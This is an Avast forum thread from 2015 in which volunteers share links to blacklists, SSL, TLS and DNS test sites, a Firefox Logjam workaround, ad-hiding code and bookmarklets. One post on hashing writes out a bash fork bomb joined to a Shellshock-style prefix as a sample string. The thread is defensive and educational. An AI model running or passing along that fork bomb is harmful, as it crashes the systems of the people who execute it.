http://www.norse-corp.com/darklist.html
http://openphish.com/
http://mdl.paretologic.com/
http://www.phishtank.com/phish_archive.php
http://www.projecthoneypot.org/list_of_ips.php
http://www.scumware.org/
http://www.shadowserver.org/wiki/pmwiki.php?n=Services/Reports
http://labs.snort.org/iplists/
http://mtc.sri.com/
http://sucuri.net/?page=tools&title=blacklist
http://www.threatstop.com/
http://urlblacklist.com/
https://zeustracker.abuse.ch/blocklist.php
https://zeustracker.abuse.ch/monitor.php?browse=binaries
http://www.blade-defender.org/eval-lab/
https://malwr.com/
http://www.nictasoft.com/viruslib/   

(link source credits go to CWZ)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 15, 2015, 12:01:08 AM
Another good initiative with https being phased in: https://sslbl.abuse.ch/

Also some interesting SSL checking links given.
Like to add:
https://ssl.trustwave.com/support/support-certificate-analyzer.php?address=
https://www.whynopadlock.com/
https://certlogik.com/ssl-checker/www.reddit.com/
https://www.poodlescan.com/
https://shaaaaaaaaaaaaa.com/
https://www.trustworthyinternet.org/ssl-pulse/
https://pentest-tools.com/vulnerability-scanning/openssl-heartbleed-scanner

polonus

Title: Re: Tests and other Media topics
Post by: polonus on May 15, 2015, 10:35:30 PM
Real World Protection Test Results, download here: http://www.av-comparatives.org/wp-content/uploads/2015/05/avc_factsheet2015_04.pdf

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 18, 2015, 12:11:35 AM
Next to this DNS scanner: http://www.dnsinspect.com/stabletransit.com/1431899954
I stumbled upon this one: http://www.nabber.org/projects/dnscheck/?domain=stabletransit.com *
Both can be nicely combined when you dive into some DNS issue.
So tried to get scan results with stealth nameservers *.
Read: https://support.dnsmadeeasy.com/index.php?/Knowledgebase/Article/View/108/16/why-am-i-getting-these-stealth-name-server-errors-and-warnings link article author Jennifer Oles
Stealth name servers should never listed as authorative!
* This scan was started because of this report: http://toolbar.netcraft.com/site_report?url=http://sbdforms.com
and the Nameserver given there.

My good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 19, 2015, 06:23:44 PM
Generate hashes online with this generator: http://www.sha1-online.com/
Example: $ echo -n \`\^\-\,\;\:\!\?\.\'\"\(\)\[\]\{\}\§\@\*\/\\\&\#\%\±\<\=\>\|\~\$\€ | openssl
Output  f44e3004f07d617b06f61b57803a7abe30d414fd  (shellshock bash bug)

fork bomb () { :; }; :(){ :|: & };: -> 57785764f85505a15dd38ea7ffab35bc43512136
Result for md5:  8cf37ff23da0423b9c167dc05b6217ea

Enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 21, 2015, 07:04:35 AM
Tested the avast forum site against Logjam PFS Deployment: Test A ServerGo
Warning! This site uses a commonly-shared 1024-bit Diffie-Hellman Group, and might be in range of being broken by a nation-state. It might be a good idea to generate a unique, 2048-bit group for the site.

Big Blue now safe, Firefox and Google Chrome still unpatched.
Due to the weakened export downgraded encryption (USA export encryption restrictions during the 90's and beyond caused this threat) Logjam is now a problem to be mitigated all over the world.
Server test can be found here: https://weakdh.org/sysadmin.html

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on May 21, 2015, 02:01:28 PM
Tested the avast forum site against Logjam PFS Deployment: Test A ServerGo
Warning! This site uses a commonly-shared 1024-bit Diffie-Hellman Group, and might be in range of being broken by a nation-state. It might be a good idea to generate a unique, 2048-bit group for the site.

Big Blue now safe, Firefox and Google Chrome still unpatched.
Due to the weakened export downgraded encryption (USA export encryption restrictions during the 90's and beyond caused this threat) Logjam is now a problem to be mitigated all over the world.
Server test can be found here: https://weakdh.org/sysadmin.html (https://weakdh.org/sysadmin.html)

polonus
It's actually the cyber crook that caused this problem. It's their exploitation of this 'weakness' that's the problem. :) (I'm being sarcastic.)
Title: Re: Tests and other Media topics
Post by: polonus on May 21, 2015, 03:46:43 PM
Hi bob3160,

And did not government promise recently they would no longer sit on these hacks, but to reveal them to us?  ;D

All your weakened encrypted traffic could be easily siphoned and decrypted by design, alas large parts of that traffic.
Read: http://www.dailydot.com/politics/logjam-vpn-top-sites-vulnerability/

UC Browser, very popular in China was deliberately being infested by NSA etc.: https://citizenlab.org/2015/05/a-chatty-squirrel-privacy-and-security-issues-with-uc-browser/

Intelligence services "helped" general internet security big time during recent years with their paranoia (ironic and sarcastic remark)  :()

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on May 21, 2015, 04:12:16 PM
Tested the avast forum site against Logjam PFS Deployment: Test A ServerGo
Warning! This site uses a commonly-shared 1024-bit Diffie-Hellman Group, and might be in range of being broken by a nation-state. It might be a good idea to generate a unique, 2048-bit group for the site.

<snip>
polonus

I think the key (excuse the pun) here is might and being broken by a nation-state. When it comes to nation states, they might have the resources to break it, but you would have to wonder, would they want to I'm sure this type of stuff would have to be attractive enough to make it worthwhile.
Title: Re: Tests and other Media topics
Post by: polonus on May 21, 2015, 04:35:54 PM
Hi DavidR,

That is not the point here, whether government had the might to decrypt weakened encryption for global surveillance purposes. I understand we normally don't do that in our homes. The point is that it was done deliberately by having stronger encryption restrictions for everyone abroad and downgrading the initial encryption strenght to be able to decrypt.
Particular governments and big corporation entities worked hand in foot to achieve such a situation.

Who was asking for normal secure encryption strength to be deliberately and secretely lowered to an extent so that eavesdropping mode could be reached. Those with strong encryption were not endangered in the first place (cybercriminals etc.), the security of the normal law-abiding citizen was endangered big time and these citizens  weren't aware.

Now webmail and webserver admins all over the world have to clear up the mess after some parties could realize their global surveillance wet dreams. and parts of the internet will stay inherently insecure and dangerous in the aftermath.
Big Brother has arrived and he will never go away again.

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on May 21, 2015, 09:17:01 PM
Quote
Big Brother has arrived and he will never go away again.
Big Brother has been there since 2007 so this certainly isn't new.
Almost all the surveys I've read also confirm that most people don't care.
It's only some of the Geeks that seem to get their feathers ruffled any time one of theses articles comes out. :)
Title: Re: Tests and other Media topics
Post by: polonus on May 21, 2015, 11:05:20 PM
Hi bob3160,

Geeks or no geeks, it seems general security awareness is at an ever low ebb to-day. As you said it right, bob3160, the common user isn't interested that much. However some parties could do a much better job.. Education is where to start - we let toddlers have a smartphone or tablet very early in life. They can work it before they have even learnt to ride a little bike.

But we have also to eduate others. Users to better protect themselves and  website owners and hosters and server- and CMS-admins to better implement with security at heart. Our modern society as a whole and our very cybersecurity depends on it.

We should not want to tolerate insecure scripting anymore, not tolerate excessive header version info spreading to the world and hackers and attackers alike. No longer tolerate parties not to run latest updates and patches, configure the available header security in a way that is called best practices, not offer encryption from the weak end up, so cybercriminals and government entities can do their self-assigned deals.

Isn't there a better or more noble task for avast support, then to educate with security at heart for a safer and more secure internet. I like to be part of such a benevolent mission and has been in the past years thanks to Avast creating an opportunity to do so and add to user security. Yes and I am a proud Avast user and I have the best deals for Avast and Avast's friends at heart. Let us stand together and on the good side always.

polonus (volunteer website security analyst and website error hunter).
Title: Re: Tests and other Media topics
Post by: bob3160 on May 21, 2015, 11:58:15 PM
Quote
Education is where to start
I'm now in my 5th year of doing exactly that through the Avast sponsored security presentations (https://forum.avast.com/index.php?topic=78426.msg647360#msg647360). :)
Another way Avast is helping keep computer users secure and a bit more educated. :) The service is also totally free.
Title: Re: Tests and other Media topics
Post by: polonus on May 22, 2015, 12:51:49 AM
We all thank you for that, bob3160!
Users should have such pitch days!
These forums brought us a lot.
I am grateful.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 22, 2015, 02:21:37 PM
Logjam workaround for firefox:
Until patched you can:

Disable the insecure ciphers here:

(1) In a new tab, type or paste about:config in the address bar and press Enter. Click the button promising to be careful.

(2) In the search box above the list, type or paste ssl3 and pause while the list is filtered

(3) Double-click the security.ssl3.dhe_rsa_aes_128_sha preference to switch it from true to false (this usually would be the first item on the list)

(4) Double-click the security.ssl3.dhe_rsa_aes_256_sha preference to switch it from true to false (this usually would be the second item on the list)

That's it, you can test using: https://www.ssllabs.com/ssltest/viewMyClient.html

Credits go to MozillaZine's jscher2000

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 22, 2015, 04:40:42 PM
Always surf encrypted via: https://encrypted.google.com/
See: http://toolbar.netcraft.com/site_report?url=https://encrypted.google.com
Issues: https://foundeo.com/products/iis-weak-ssl-ciphers/test.cfm?test_domain=encrypted.google.com
Good News! This site is safe from the Logjam attack. It supports ECDHE, and does not use DHE.
IP   Connected   TLS   Insecure DHE_EXPORT   DHE   Chrome
216.58.216.238         No   
Not Supported

ECDHE
2607:f8b0:4009:809::200e      

But vulnerable to Poodle:       Scan results
GOOGLE.COM:443 (216.58.219.206) - VULNERABLE   

Startpage SSL xpi can no longer be installed under Firefox (ESR) 38 : broken .

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 22, 2015, 07:20:23 PM
HSTS Preloading: https://scotthelme.co.uk/hsts-preloading/
link article author -= Scott Helme.
https://blog.nvisium.com/2014/04/is-your-site-hsts-enabled.html
It being a double-edged sword: https://www.leviathansecurity.com/blog/the-double-edged-sword-of-hsts-persistence-and-privacy/
Also read here: http://stackoverflow.com/questions/10629397/how-to-disable-http-strict-transport-security
Already included: http://src.chromium.org/viewvc/chrome/trunk/src/net/http/transport_security_state_static.json
Included there is no guarantee for security: -braintreegateway.com -> Warning! This site uses a commonly-shared 1024-bit Diffie-Hellman group, and might be in range of being broken by a nation-state. It might be a good idea to generate a unique, 2048-bit group for the site.
IP   Connected   TLS   Insecure DHE_EXPORT   DHE   Chrome
204.109.13.100         No   Common 1024-bit Prime   ECDHE
The security header configuration for this site also has a lot of issues, see attached.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 23, 2015, 12:29:19 AM
Another test site and another test to take:
Safe.

We have examined your OS and browser version information and determined that an active vulnerability test was appropriate. Fortunately, your browser correctly aborted loading our test image upon seeing an invalid ServerKeyExchange message.

https://gotofail.com/#
And here: https://www.howsmyssl.com/
Verdict probably OK - (not tested here: Logjam Vulnerability (Experimental)
Your user agent is vulnerable. Upgrade as soon as possible.
But we do not have an update yet, hurry up Google developers,
because criminals on coffee-shop Wi-Fi networks are also abusing Logjam and not only state actors!

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 23, 2015, 03:25:50 PM
Logjam mitigating efforts and tests: https://news.ycombinator.com/item?id=9574408
Is avast VPN patched? Update your VPN Server: VPN servers that support IKEv1 protocol for encryption should be updated to disable any keysize less than 1024 bits – or better yet, use elliptical curve keys. Organizations should also consider using SSL VPN technology, which is better supported as its underlying OpenSSL is updated regularly against various encryption protocol vulnerabilities.
Read about affected Cloud Services: https://www.skyhighnetworks.com/cloud-security-blog/logjam-exposed-575-cloud-services-potentially-vulnerable-to-man-in-the-middle-attacks/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 23, 2015, 07:46:26 PM
In the light of all the recent data breaches it is a good thing to test here:
https://haveibeenpwned.com/
Sometimes one can/could get a "Oh.no catastrophic failure!".

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 25, 2015, 12:55:11 AM
Still around Freak vulnerability
However, even if your browser is safe, certain third-party software, including some anti-virus products and adware programs, can expose you to the attack by intercepting TLS connections from the browser. If you are using a safe browser but our client test says you’re vulnerable, this is a likely cause.
Test here: https://freakattack.com/clienttest.html
Read: https://freakattack.com/
You can also test here (freak test included) - all not on IE are vulnerable to logjam: https://www.ssllabs.com/ssltest/viewMyClient.html

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 26, 2015, 12:47:18 PM
Check your client against FREAK: https://freakattack.com/clienttest.html
Mozilla config recommendations: https://wiki.mozilla.org/Security/Server_Side_TLS#Recommended_configurations
Server test: https://www.ssllabs.com/ssltest/

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on May 26, 2015, 01:41:02 PM
Check your client against FREAK: https://freakattack.com/clienttest.html (https://freakattack.com/clienttest.html)
Mozilla config recommendations: https://wiki.mozilla.org/Security/Server_Side_TLS#Recommended_configurations (https://wiki.mozilla.org/Security/Server_Side_TLS#Recommended_configurations)
Server test: https://www.ssllabs.com/ssltest/ (https://www.ssllabs.com/ssltest/)

polonus
Must have learned something over the years. :)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1432640423513-4078.png)
Title: Re: Tests and other Media topics
Post by: Lisandro on May 26, 2015, 10:07:00 PM
Mine passed too. I must have learned from Bob  :D
Title: Re: Tests and other Media topics
Post by: DavidR on May 26, 2015, 10:18:57 PM
Check your client against FREAK: https://freakattack.com/clienttest.html
Mozilla config recommendations: https://wiki.mozilla.org/Security/Server_Side_TLS#Recommended_configurations
Server test: https://www.ssllabs.com/ssltest/

polonus

I haven't changed a thing and mine doesn't fail nor does it pass as the site can't even run the test unless I allow NoScript for the site and allow RequestPolicy (continued) for the three other sites.

Only when I give implicit permission does the test run and complete and record "Good News! Your browser appears to be safe from the FREAK attack. "

This is why I rarely bother with these types of tests because of my locked down setup with NoScript and RequestPolicy it isn't going anywhere to test. The same should be correct for a live incident.
Title: Re: Tests and other Media topics
Post by: polonus on May 26, 2015, 10:46:25 PM
Hi DavidR,

Only minus here is that for logjam and freak NoScript and RequestPolicy do not protect.
You cannot be protected by neither NoScript nor RequestPolicy against RSA vulnerabilities.
You should be glad that you have checked the test that was provided here, seen in the line of SSL-weakening that is brought about by many a AV https-scan, read from someone who is concerned and where AV https scanning made users vulnerable to FREAK attack as we test: https://blog.hboeck.de/archives/869-How-Kaspersky-makes-you-vulnerable-to-the-FREAK-attack-and-other-ways-Antivirus-software-lowers-your-HTTPS-security.html  link article author = Hanno Bock
Why AV https scanning does not perform certifcate-pinning - why? Read here: https://wiki.mozilla.org/SecurityEngineering/Public_Key_Pinning

polonus (trust what you test yourself)

To read Avast's official reaction from Deborah Salmi: https://blog.avast.com/2015/05/25/explaining-avasts-https-scanning-feature/

D
Title: Re: Tests and other Media topics
Post by: polonus on May 26, 2015, 11:18:36 PM
Certificate pinning is done in firefox by Certificate Patrol add-on: http://patrol.psyced.org/
Read here for background info: https://security.stackexchange.com/questions/16293/how-can-end-users-detect-malicious-attempts-at-ssl-spoofing-when-the-network-alr
Test: https://www.networking4all.com/en/support/tools/csr+check/
Quote
In Google Chrome: Accessing Certificates Via Address Bar
You can also view an SSL certificate directly from the address bar. Click on the padlock icon to the right of the website's address and then click the "View Certificate" link. The Certificate dialog box will open. Information about the SSL certificate appears immediately. Click the "Details" tab to view specific details, including encryption method, serial number and if the certificate is valid and then click "OK" to close the Certificate dialog box.
Quoted Info credits go to Nick Davies.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 27, 2015, 01:01:23 AM
Passed the Qualys Browser check for my pre-release version of Google Chrome browser:  ;D

Installed Version: 43.0.2357.81
Stable Version: 42.0.2311.152
Quote
Congratulations! You passed Qualys BrowserCheck.
We recommend you scan your browser regularly to stay up to date with the latest versions and plugins.

polonus

P.S. The logjam vulnerability will be patched with version 45.
Title: Re: Tests and other Media topics
Post by: polonus on May 29, 2015, 01:01:05 PM
Cybersecurity Tool Domain Tracker by Xen0ph0n. : http://www.dtrackr.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 31, 2015, 11:52:37 AM
Check whether your router is secure: https://campaigns.f-secure.com/router-checker/

No issues were found

All is well. Have a nice day!

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on May 31, 2015, 02:40:00 PM
Check whether your router is secure: https://campaigns.f-secure.com/router-checker/ (https://campaigns.f-secure.com/router-checker/)

No issues were found

All is well. Have a nice day!

polonus
Using the "Scan for Network Threats" function in Avast also tells you that and a lot more. :)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1433075733700-37611.png)


(http://www.screencast-o-matic.com/screenshots/u/Lh/1433075984216-72670.png)
Title: Re: Tests and other Media topics
Post by: polonus on May 31, 2015, 02:47:32 PM
The home computer with Avast on it is at home, gonna compare it when back home. ;D

pol
Title: Re: Tests and other Media topics
Post by: bob3160 on May 31, 2015, 06:25:07 PM
The home computer with Avast on it is at home, gonna compare it when back home. ;D

pol
I take my Avast with me wherever I go. :)
Title: Re: Tests and other Media topics
Post by: polonus on May 31, 2015, 06:29:18 PM
Hi bob3160,

Have to convince the neighbours here to install avast then,
but I have avast  always on my smartphone.

pol
Title: Re: Tests and other Media topics
Post by: bob3160 on May 31, 2015, 06:33:30 PM
Hi bob3160,

Have to convince the neighbours here to install avast then,
but I have avast  always on my smartphone.

pol
Since I have no problem convincing total stranger to do that on a regular basis, persuading a neighbor shouldn't be a problem for you. :)
Title: Re: Tests and other Media topics
Post by: polonus on June 12, 2015, 05:33:56 PM
L.S.

What browser extensions are violating your privacy by selling de-anonymized and geo-location rich user info to third parties.
Aggregated info with anonymized non-reconstructable user info and without reconstructable geo-location info is not considered a violation as such as you agreed to it by installing a free extension. Test with Extension Defender or through the Avast Privacy Module.
Reads also https://blog.torproject.org/blog/tor-browser-45-released  as Disconnect Search add-on was accused of such alleged abuse?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 13, 2015, 07:48:54 PM
Code to permanently block Admob ads
Code: [Select]
(eg, inside a "if" block)

(LinearLayout) adscontainer = (LinearLayout) findViewById(R.id.adsContainer);

View admobAds = (View) findViewById(R.id.admobAds);

adscontainer.removeView(admobAds);
private void hideAd() {
    final AdView adLayout = (AdView) findViewById(R.id.adView1);
    runOnUiThread(new Runnable() {
        @Override
        public void run() {
            adLayout.setEnabled(false);
            adLayout.setVisibility(View.GONE);
        }
    });
}
credits go to Quartertone & Chris Dryden

polonus

Title: Re: Tests and other Media topics
Post by: polonus on June 15, 2015, 12:26:46 PM
Will https be securing access to wikimedia? Re: https://blog.wikimedia.org/2015/06/12/securing-wikimedia-sites-with-https/
Read: https://en.wikipedia.org/wiki/Censorship_of_Wikipedia
Quote
To perform the 'Website Test behind the Great Firewall of China', the monitoring agent resolves the domain name from selected location in China, connects to the test website and downloads the complete HTML content. The test results display DNS lookup time, time to connect, time to download the first byte and time to download the complete HTML of the tested web site. The total response time shows how long it takes for your website to download.
-> http://www.websitepulse.com/help/testtools.china-test.html
Tested From:   Shanghai, China
Tested At:   2015-06-15
10:24:51 (GMT +00:00)
URL Tested:   https://blog.wikimedia.org/2015/06/12/securing-wikimedia-sites-with-https/
Resolved As:   192.0.79.33
Status:   OK
Response Time:   22.845 sec
DNS:   14.009 sec
Connect:   1.085 sec
Redirect:   0.000 sec
First Byte:   2.629 sec
Last Byte:   5.122 sec
Size:   52685 bytes

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 16, 2015, 12:00:26 PM
Avast's latest real world test results: http://chart.av-comparatives.org/chart1.php

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 17, 2015, 06:31:37 PM
Patch logjam vulnerability in Google Chrome with SSL Locker: https://ssllocker.com/download.html

First download the latest version Chrome or update to at least Chrome ver 41
When using the latest Chrome and ChromeLocker Poodle, FREAK, Bar Mitzvah, Logjam
and other MiTM vulnerabilities are mitigated.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 21, 2015, 06:13:23 PM
Re: http://d3xt3r.com/dashboard?check_ip=117.169.1.165
Blacklisted and spammer: https://www.stopforumspam.com/ipcheck/117.169.1.165
and http://www.ip-finder.me/117.169.1.165/
and http://www.projecthoneypot.org/ip_117.169.1.165
and here: http://www.blocklist.de/en/view.html?ip=117.169.1.165
and http://www.liveipmap.com/117.169.1.165
and here: https://cleantalk.org/blacklists/117.169.1.165
and http://ozzed.net/spamburp/Index.asp?page=1&sort=8
and (not safe): htxps://fspamlist.com/index.php?c=latest

polonus

And a check and test site as bonus:
http://www.check-and-secure.com/portcheck/_en/
http://www.check-and-secure.com/ipcheck/_en/solution/clean.php

D
Title: Re: Tests and other Media topics
Post by: polonus on June 22, 2015, 04:25:14 PM
A proxy could mean a threat, because of (alleged) traffic-manipulation.
The use of it is therefore not advisable. Anyway, some do...
Check proxies here: https://proxycheck.haschek.at/
And: http://urlchecker.org/proxy
See: http://proxyipchecker.com/
Read: https://blog.haschek.at/post/fd9bc

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 23, 2015, 04:36:12 PM
User Agent track site: http://www.botsvsbrowsers.com/SimulateUserAgent.asp
Toggle -> https://www.dephormation.org.uk/?page=81
Test your browser for trackability: https://panopticlick.eff.org/
User Agent Switcher for Chrome: https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 25, 2015, 10:49:12 AM
Question? How can I check whether Google Translate Chinese is working correctly?
There is a big difference in Chinese between brother (either "big brother" or "little brother") with sister there is a similar difference with additional strokes. How can I check it works correctly?
I was a proctor at an exam in Mandarin Chinese and now just curious...

Anyone.

polonus
Title: Re: Tests and other Media topics
Post by: Asyn on June 25, 2015, 01:16:35 PM
Question? How can I check whether Google Translate Chinese is working correctly?
Only native speakers can answer that, you could ask in the Chinese section of the forum.

Groetjes,
Asyn
Title: Re: Tests and other Media topics
Post by: bob3160 on June 25, 2015, 01:17:17 PM
Question? How can I check whether Google Translate Chinese is working correctly?
There is a big difference in Chinese between brother (either "big brother" or "little brother") with sister there is a similar difference with additional strokes. How can I check it works correctly?
I was a proctor at an exam in Mandarin Chinese and now just curious...

Anyone.

polonus
See if this does the trick for you:
http://www.word2word.com/free.html (http://www.word2word.com/free.html)
Title: Re: Tests and other Media topics
Post by: polonus on July 04, 2015, 04:56:55 PM
Test your IP version 6 readiness here: http://ip6.nl/

Another test do the vulnerability test on the JQuery version of a webpage: http://domstorm.skepticfx.com/modules?id=529bbe6e125fac0000000003 - http://domstorm.skepticfx.com/modules/run?id=529bbe6e125fac0000000003

A JQuery bookmarklet - http://www.learningjquery.com/2009/04/better-stronger-safer-jquerify-bookmarklet/
It's a nice little tool that allows you to play around with jQuery on a page that doesn't already have jQuery loaded and see the results immediately - either "This page is now jQuerified" or "This page was already jQuerified."

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on July 04, 2015, 05:38:13 PM
Test your IP version 6 readiness here: http://ip6.nl/ (http://ip6.nl/)

Another test do the vulnerability test on the JQuery version of a webpage: http://domstorm.skepticfx.com/modules?id=529bbe6e125fac0000000003 (http://domstorm.skepticfx.com/modules?id=529bbe6e125fac0000000003) - http://domstorm.skepticfx.com/modules/run?id=529bbe6e125fac0000000003 (http://domstorm.skepticfx.com/modules/run?id=529bbe6e125fac0000000003)

A JQuery bookmarklet - http://www.learningjquery.com/2009/04/better-stronger-safer-jquerify-bookmarklet/ (http://www.learningjquery.com/2009/04/better-stronger-safer-jquerify-bookmarklet/)
It's a nice little tool that allows you to play around with jQuery on a page that doesn't already have jQuery loaded and see the results immediately - either "This page is now jQuerified" or "This page was already jQuerified."

polonus
(http://www.screencast-o-matic.com/screenshots/u/Lh/1436024235780-73631.png)
Title: Re: Tests and other Media topics
Post by: Para-Noid on July 04, 2015, 07:55:50 PM
Introducing Free Global Website Performance Tool

https://blog.sucuri.net/2015/05/introducing-free-global-website-performance-tool.html?utm_campaign=Performance%20Tool&utm_content=17556994&utm_medium=social&utm_source=googleplus

How fast is your site? You can test here the performance of any of your sites from across the globe.

https://performance.sucuri.net/?utm_campaign=Performance%20Tool&utm_medium=social&utm_source=googleplus
Title: Re: Tests and other Media topics
Post by: polonus on July 05, 2015, 01:57:45 PM
Problems with your Internet connection,
There is something you could do for starters, that is test it:
[Windows-key]r key combination -> cmd.exe (in admin mode only, else you are not allowed to flushdns)
nslookup www.quantum.com    (your providers address - just a random example)
ipconfig /flushdns
nslookup www.quantum.com 8.8.8.8

Report to a qualified remover here for instance what results you got for 2 nslookup commands.
Of course you could test another dns-entry, do by all means, preferably one that gives DNS-issues/problems for you  (in  Internet Explorer). Info credits go to Tijs, Tera Honourable Senior Member

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 05, 2015, 04:51:38 PM
Run your code through the sniffer here: http://squizlabs.github.io/HTML_CodeSniffer/

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 06, 2015, 09:30:04 PM
A test site for Moble Friendliness of Webpages, also rather interesting for folks like Polonus, volunteer website analyst regarding insecurities on sites. Enjoy this test site, folks, enjoy: http://mobilefriendlytest.website/index.php

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on July 07, 2015, 05:51:17 PM
To save offline and analyze - WinHTTrack Website Copier 3.48-21
(Ons fouten en problemen mede te delen)

Ontwikkeling:
Interface (Windows): Xavier Roche
Spider: Xavier Roche
JavaParserClasses: Yann Philippot

(C)1998-2003 Xavier Roche and other contributors
MANY THANKS for Dutch translations to:
Rudi Ferrari (Wyando@netcologne.de)

Bezoek onze webpagina :
http://www.httrack.com

Combined with analyzer SensePost Wikto 2.1. http://sensepost-wikto.software.informer.com/download/
Wikto is Nikto for Windows - but with a couple of fancy extra features including fuzzy logic error code checking, a back-end miner, Google-assisted directory mining and real time HTTP request/response monitoring.

Wikto is not a web application scanner. It is totally unaware of the application (if any) that’s running on the web site. Wikto will not look for SQL injection problems, authorization problems etc. on a web site. It is also not a network level scanner – so it won’t try to find open ports, or see if the web site is properly firewalled. Wikto rather operates between these two levels – it tries to, for instance, find interesting directories and files on the web site, it looks for sample scripts that can be abused or finds known vulnerabilities in the web server implementation itself.

Enjoy, enjoy, but be aware of all the legal implications for your country using the software
only for websites where you have explicit written permission to scan (e.g. websites you own),
in all other circumstances do not scan any website directly - use so-called third party cold reconnaissance scanning.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 12, 2015, 10:22:39 PM
Hi my good friends,

Who is using this.
Adopted as a userscript in Tampermonkey -> http://downyours.org/?filters_484a7c06c4b8474f8853a42eb790a0dee87fc3f8b64c485cb9ce6832b35dc67b

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 14, 2015, 10:49:05 PM
Make your own bookmarklets and drag the links created onto your bookmark toolbar in the browser.
Create the bookmarklet yourself  here http://mrcoles.com/bookmarklet/ with this code to remove bloat from a page
Code: [Select]
javascript:(function()%7Balert(%22test!%22)%20javascript%3A(function()%7Bfunction%20R(w)%7Btry%7Bvar%20d%3Dw.document%2Cj%2Ci%2Ct%2CT%2CN%2Cb%2Cr%3D1%2CC%3Bfor(j%3D0%3Bt%3D%5B%22object%22%2C%22embed%22%2C%22applet%22%2C%22iframe%22%5D%5Bj%5D%3B%2B%2Bj)%7BT%3Dd.getElementsByTagName(t)%3Bfor(i%3DT.length-1%3B(i%2B1)%26%26(N%3DT%5Bi%5D)%3B--i)if(j!%3D3%7C%7C!R((C%3DN.contentWindow)%3FC%3AN.contentDocument.defaultView))%7Bb%3Dd.createElement(%22div%22)%3Bb.style.width%3DN.width%3B%20b.style.height%3DN.height%3Bb.innerHTML%3D%22%3Cdel%3E%22%2B(j%3D%3D3%3F%22third-party%20%22%2Bt%3At)%2B%22%3C%2Fdel%3E%22%3BN.parentNode.replaceChild(b%2CN)%3B%7D%7D%7Dcatch(E)%7Br%3D0%7Dreturn%20r%7DR(self)%3Bvar%20i%2Cx%3Bfor(i%3D0%3Bx%3Dframes%5Bi%5D%3B%2B%2Bi)R(x)%7D)()%7D)()
  and this code to rewrite redirects
Code: [Select]
javascript:(function(){var k,x,t,i,j,p; for(k=0;x=document.links[k];k++){t=x.href.replace(/[%]3A/ig,':').replace(/[%]2f/ig,'/');i=t.lastIndexOf('http');if(i>0){ t=t.substring(i); j=t.indexOf('&'); if(j>0)t=t.substring(0,j); p=/https?\:\/\/[^\s]*[^.,;'">\s\)\]]/.exec(unescape(t)); if(p) x.href=p[0]; } else if (x.onmouseover&&x.onmouseout){x.onmouseover(); if (window.status && window.status.indexOf('://')!=-1)x.href=window.status; x.onmouseout(); } x.onmouseover=null; x.onmouseout=null; }})();
Enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: Para-Noid on July 14, 2015, 11:14:52 PM
https://sitecheck.sucuri.net/?utm_campaign=SiteCheck&utm_medium=social&utm_source=googleplus
https://www.youtube.com/watch?v=su6fAaBAULg&feature=autoshare
Title: Re: Tests and other Media topics
Post by: polonus on July 16, 2015, 02:31:53 PM
Validate your SSL connection strength: https://calomel.org/firefox_ssl_validation.html
You could combine this with the Netcraft extension report.
And of course a Qualys SSL scan: https://www.ssllabs.com/ssltest
or the other tests as given in this thread earlier.

polonus
Title: Re: Tests and other Media topics
Post by: Para-Noid on July 21, 2015, 05:40:56 PM
How fast is your site? You can test here the performance of any of your sites from across the globe.

https://performance.sucuri.net/?utm_campaign=Performance%20Tool&utm_medium=social&utm_source=googleplus
Title: Re: Tests and other Media topics
Post by: bob3160 on July 21, 2015, 05:51:05 PM
How fast is your site? You can test here the performance of any of your sites from across the globe.

https://performance.sucuri.net/?utm_campaign=Performance%20Tool&utm_medium=social&utm_source=googleplus (https://performance.sucuri.net/?utm_campaign=Performance%20Tool&utm_medium=social&utm_source=googleplus)
Thanks :)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1437493822213-53383.png)
Title: Re: Tests and other Media topics
Post by: polonus on July 28, 2015, 06:15:50 PM
Here on the avast official support forums various users use all sort of website scan sites.
The results of such scans  may set us at ease or
they may encourage us to just look again or avoid to visit a particular website, url, uri....

As our friend Para-Noid has learned us: "You can only trust what you have tested yourself".

And as his forum friend I'd wholeheartedly agree with this Para_Noid's credo.
It is a home-ringing truth, my dear avast friends,

Now we may ask in all earnesty: "Who can we really still trust online these days?".

We have bookmarklets to detect whether a site has JQuery and what (vulnerable) version.
On this fine page we also find fine vulnerability scanners for WP and Joomla CMS results
on websites and more scans and tools: https://hackertarget.com

Another  interesting website to find out about what technologies are being used to be used
on a particular website can be found here:
http://pagexray.com/site/  x      for  x give in the domain of site you wanna check.

enjoy, my good friends, enjoy,,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 28, 2015, 07:00:29 PM
Various handy utilities to be found here: http://www.nothink.org/utilities.php

